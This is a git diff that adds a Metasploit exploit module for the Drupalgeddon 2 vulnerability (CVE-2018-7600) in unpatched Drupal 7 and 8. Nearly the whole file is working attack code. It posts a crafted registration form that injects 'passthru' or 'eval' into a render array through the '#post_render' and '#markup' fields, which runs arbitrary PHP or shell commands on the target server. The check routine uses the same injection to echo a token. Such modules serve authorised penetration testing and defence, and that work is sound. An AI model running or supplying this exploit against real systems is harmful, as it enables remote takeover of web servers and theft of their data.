diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
new file mode 100644
index 0000000000000..979dda4ad5427
--- /dev/null
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Drupal Drupalgeddon 2',
+      'Description'    => %q{
+        This module exploits a vulnerability.
+      },
+      'Author'         => [
+        'Jasper Mattsson', # Vuln discovery
+        'a2u',             # PoC exploit
+        'Nixawk',          # PoC exploit
+        'wvu'              # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-7600'],
+        ['URL', 'https://www.drupal.org/sa-core-2018-002'],
+        ['URL', 'https://greysec.net/showthread.php?tid=2912'],
+        ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
+        ['URL', 'https://github.com/a2u/CVE-2018-7600'],
+        ['URL', 'https://github.com/nixawk/labs/issues/19']
+      ],
+      'DisclosureDate' => 'Mar 28 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php', 'unix'],
+      'Arch'           => [ARCH_PHP, ARCH_CMD],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Drupal install', '/'])
+    ])
+  end
+
+  def check
+    token = Rex::Text.rand_text_alphanumeric(8..42)
+
+    res = exploit(func: 'passthru', code: "echo #{token}")
+
+    if res && res.code == 200 && res.body.include?(token)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit(func: 'eval', code: payload.encoded, output: false)
+    if payload && payload.arch.first == ARCH_CMD
+      # TODO: passthru() may be disabled, so try others
+      func   = 'passthru'
+      output = true
+    end
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/user/register',
+      'vars_get'  => {
+        'element_parents' => 'account/mail/#value',
+        'ajax_form'       => 1,
+        '_wrapper_format' => 'drupal_ajax'
+      },
+      'vars_post' => {
+        'form_id'              => 'user_register_form',
+        '_drupal_ajax'         => 1,
+        'mail[#type]'          => 'markup',
+        'mail[#post_render][]' => func,
+        'mail[#markup]'        => code
+      }
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::UnexpectedReply, res.inspect)
+    end
+
+    if output
+      vprint_status('Output from target:')
+      print_line(res.body)
+    end
+
+    res
+  end
+
+end